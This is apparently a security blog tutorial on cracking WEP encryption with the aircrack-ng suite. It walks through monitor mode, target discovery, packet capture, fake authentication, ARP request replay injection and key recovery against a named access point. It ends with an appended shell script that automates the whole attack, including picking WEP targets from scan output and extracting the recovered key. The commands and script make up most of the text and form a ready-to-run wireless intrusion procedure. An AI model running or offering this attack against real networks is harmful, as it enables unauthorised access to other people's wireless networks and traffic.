WEP (Wired Equivalent Privacy) was one of the first authentication and encryption mechanisms used for wireless networks. It has been known to be insecure for well over a decade because of cryptographic weaknesses in the way it uses RC4 (initialization vector reuse, key management, and so on), which we won't discuss in this post, since that is a completely different topic.
Though it is deprecated and should never be used, we still see it in lots of home networks. One reason is very old routers that don't support WPA or WPA2; the other is lack of awareness.
So in this section, we will use aircrack-ng to demonstrate how easy it is to crack a WEP key no matter how complex it is. The attack is statistical rather than a brute-force search, so the complexity of the key does not help the defender; a longer key only means a few more packets to collect.
PLACING YOUR WIRELESS ADAPTER IN MONITOR MODE
Step 1—First things first: we need to make sure that our network card is placed in monitor mode. We have already learnt that the "airmon-ng start wlan0" command accomplishes this; it creates a monitor interface (mon0 in the aircrack-ng version used here; newer versions name it wlan0mon instead). We can use "iwconfig" to verify that the new interface reports Mode:Monitor, meaning it can now sniff all frames on the channel rather than only those addressed to it.

DETERMINING THE TARGET WITH AIRODUMP-NG
Step 2—Next, we will use airodump-ng to discover the neighbouring networks that have WEP encryption enabled (the ENC column reads WEP). Our target has an ESSID (the same thing as the SSID) of "Linksys" and a BSSID of 98:FC:11:C9:14:22, and it is on channel 6. Make a note of the ESSID, BSSID and channel, because we will need them in the following steps.
Command:
airodump-ng mon0

ATTACKING THE TARGET
Step 3—In order to crack the WEP key, we need to capture the data frames (each of them carries one initialization vector) and write them to a file that we can analyze later. To accomplish this task, we use airodump-ng again, but restrict our monitoring to the access point (AP) we are targeting.
STRUCTURE
airodump-ng --bssid (bssid of the target) -c (channel) -w (file name prefix) (interface)
Command:
airodump-ng --bssid 98:fc:11:c9:14:22 --channel 6 --write RHAWEP mon0

We had to specify the BSSID of the target that we learnt in the previous step, followed by the channel the access point is on, which we also learnt in the previous step (channel 6). The reason we lock it to channel 6 is that we don't want our wireless card to keep hopping between channels and miss frames. Then we instruct it to write the results to files whose names start with RHAWEP; airodump-ng appends a run number, so the first run produces RHAWEP-01.cap, RHAWEP-01.csv and Kismet-format files, which lets us analyze the capture with different tools. What we are interested in is the contents of the .cap file.

SPEEDING UP THE CRACKING PROCESS
Step 4—In order to crack the WEP key, we need data packets, but waiting for a legitimate client to generate them would be time consuming. To speed up the process, we can use a fake authentication attack, which associates our MAC address with the access point so that the AP will accept the frames we inject in the next step. This attack is needed in the case where no clients are associated with the access point; if a legitimate client is already associated, you can inject using that client's MAC address instead and skip this step.
STRUCTURE
aireplay-ng -1 (delay in seconds between re-associations) -a (bssid of the target) (interface)
Command:
aireplay-ng -1 3 -a 98:fc:11:c9:14:22 mon0

The -1 parameter selects the fake authentication attack, and the number that follows it is the delay in seconds between re-association attempts: 0 would authenticate a single time, while 3 keeps re-associating every three seconds, which keeps the association alive on APs that drop idle clients. Then comes the -a parameter followed by the BSSID of the target, and finally the interface, mon0. A successful run prints "Association successful :-)".
INJECTING ARP PACKETS
Step 5—The success rate of our attack depends upon the number of initialization vectors we gather. A fake authentication attack does not generate any data packets by itself, so we use attack number 3, "ARP Request Replay": aireplay-ng waits for an ARP request on the network, then retransmits it to the AP again and again, and the AP re-broadcasts every copy encrypted under a new IV. This is the most effective way of generating initialization vectors, because ARP frames are small, have a recognisable fixed size, and the AP never tires of relaying them.

STRUCTURE
aireplay-ng -3 -b (bssid of the target) -h (MAC address of mon0) (interface)
Command:
aireplay-ng -3 -b 98:fc:11:c9:14:22 -h 00:c0:ca:50:f8:32 mon0

The -3 stands for "ARP Request Replay", followed by the -b parameter, which is the BSSID of the target. The -h parameter is new; it is the MAC address of the mon0 interface, and it must be the same address the access point accepted during the fake authentication, otherwise the AP silently drops the injected frames.
Now we wait for the number of data packets (the #Data column in airodump-ng) to reach at least 20,000; the more packets, the more quickly the key can be recovered. That count is plenty for a 40-bit (so-called 64-bit) key like the one in this example; a 104-bit (128-bit) key typically needs 40,000 or more before aircrack-ng succeeds.
CRACKING THE WEP
Step 6—Finally, it's time to recover the key from the capture file, RHAWEP-01.cap (remember that airodump-ng appends -01 to the prefix we gave it). We use aircrack-ng to do this. It can be started while airodump-ng and aireplay-ng are still running; if it fails, it waits for more IVs to arrive in the file and tries again.
Command:
aircrack-ng RHAWEP-01.cap

So we have successfully recovered the key, which aircrack-ng prints as C3:6E:E8:F7:82 (five bytes, i.e. a 40-bit key). Just remove the colons from the output and you are left with the WEP key as it would be typed into a client, which in this case is C36EE8F782. Nothing was brute-forced: the key fell out of a statistical analysis of the captured IVs, which is why its complexity never mattered.
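The six steps above, collected into one script as an added example. This is not code from the original post or from the aircrack-ng project; it only calls the aircrack-ng tools with the flags documented above, using the post's target values (BSSID 98:fc:11:c9:14:22, channel 6, capture prefix RHAWEP, injecting MAC 00:c0:ca:50:f8:32). The interface names, the MIN_IVS threshold and the airodump-ng CSV sample are assumptions of the example. It goes a little beyond the post in two places: it reads airodump-ng's own CSV output to pick WEP targets and to poll the IV count instead of watching the screen, and it pulls the key out of aircrack-ng's "KEY FOUND!" line and strips the colons for you. With DRY_RUN=1 (the default) it only prints the commands it would run, so it can be read and exercised on any machine; DRY_RUN=0 needs root, a card that supports injection and the aircrack-ng suite.

```shell
#!/bin/sh
# Added example (not the original post's code): the six-step WEP procedure as one
# script. Target values come from the post; IFACE, MON, OUR_MAC and MIN_IVS are
# assumptions that you override from the environment. Newer airmon-ng versions
# name the monitor interface wlan0mon rather than mon0, so set MON accordingly.
IFACE=${IFACE:-wlan0}
MON=${MON:-mon0}
OUR_MAC=${OUR_MAC:-00:c0:ca:50:f8:32}   # MAC of the monitor interface (value from the post)
BSSID=${BSSID:-98:fc:11:c9:14:22}       # target AP (value from the post)
CHANNEL=${CHANNEL:-6}
PREFIX=${PREFIX:-RHAWEP}                # airodump-ng writes PREFIX-01.cap and PREFIX-01.csv
MIN_IVS=${MIN_IVS:-20000}               # enough for a 40-bit key; 104-bit keys want more
DRY_RUN=${DRY_RUN:-1}                   # 1 = print commands only, 0 = really run them (root)

run() { if [ "$DRY_RUN" = 1 ]; then echo "$*"; else "$@"; fi; }
bg() {
    # long-running tools (capture, replay) are backgrounded so the next step can proceed
    if [ "$DRY_RUN" = 1 ]; then
        echo "$* &"
    else
        "$@" >/dev/null 2>&1 &
    fi
}

# Step 2 helper: list WEP networks from airodump-ng's CSV. Columns in that file are
# 1 BSSID, 4 channel, 6 Privacy, 14 ESSID; the client table after "Station MAC" is skipped.
wep_targets() {
    awk -F',' '
        $1 ~ /^ *Station MAC/ { exit }
        NF >= 14 {
            gsub(/^ +| +$/, "", $1); gsub(/^ +| +$/, "", $4)
            gsub(/^ +| +$/, "", $6); gsub(/^ +| +$/, "", $14)
            if ($6 == "WEP") print $1, $4, $14
        }' "$@"
}

# Step 5 helper: the "# IV" column (11) for our BSSID, the count airodump-ng shows as
# #Data on screen. Prints nothing when the BSSID is not in the file.
iv_count() {
    awk -F',' -v b="$BSSID" '
        $1 ~ /^ *Station MAC/ { exit }
        { gsub(/ /, "", $1) }
        toupper($1) == toupper(b) { gsub(/ /, "", $11); print $11 }' "$@" 2>/dev/null
}
ready_to_crack() { n=$(iv_count "$@"); [ "${n:-0}" -ge "$MIN_IVS" ]; }

# Step 6 helper: aircrack-ng prints "KEY FOUND! [ C3:6E:E8:F7:82 ]"; strip the colons
# to get the key in the form a client expects.
key_from_aircrack_output() {
    sed -n 's/.*KEY FOUND! \[ *\([0-9A-Fa-f:]*\) *\].*/\1/p' | tr -d ':'
}

# Constructed airodump-ng CSV (not a real capture), laid out the way airodump-ng writes
# it, so the helpers above can be exercised without a wireless card.
sample_csv() {
    cat <<'EOF'

BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
98:FC:11:C9:14:22, 2011-03-01 10:00:00, 2011-03-01 10:20:00,  6,  54, WEP , WEP, , -41,  310, 21504,   0.  0.  0.  0,   7, Linksys,
00:11:22:33:44:55, 2011-03-01 10:00:00, 2011-03-01 10:20:00, 11,  54, WPA2, CCMP, PSK, -60,  120,     0,   0.  0.  0.  0,   6, Home-N,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
00:C0:CA:50:F8:32, 2011-03-01 10:01:00, 2011-03-01 10:20:00, -30,   900, 98:FC:11:C9:14:22,
EOF
}

wep_attack() {
    run airmon-ng start "$IFACE"                                                      # step 1: monitor mode
    run iwconfig "$MON"
    bg  airodump-ng --bssid "$BSSID" --channel "$CHANNEL" --write "$PREFIX" "$MON"    # step 3: capture one AP
    run aireplay-ng -1 3 -a "$BSSID" -h "$OUR_MAC" "$MON"                             # step 4: fake auth, re-associate every 3 s
    bg  aireplay-ng -3 -b "$BSSID" -h "$OUR_MAC" "$MON"                               # step 5: ARP request replay
    if [ "$DRY_RUN" = 1 ]; then
        echo "# then poll $PREFIX-01.csv until '# IV' for $BSSID reaches $MIN_IVS"
    else
        until ready_to_crack "$PREFIX-01.csv"; do sleep 10; done
    fi
    run aircrack-ng -b "$BSSID" "$PREFIX-01.cap"                                      # step 6: PTW attack on the IVs
}

wep_attack
```

The `-h` on the fake-authentication line is optional (aireplay-ng defaults to the interface's own MAC) but it makes explicit that steps 4 and 5 must use the same source address; `-b` on the aircrack-ng line selects the network non-interactively, which matters when the capture contains beacons from other APs. When run for real, `wep_attack | key_from_aircrack_output` leaves you with just the colon-free key.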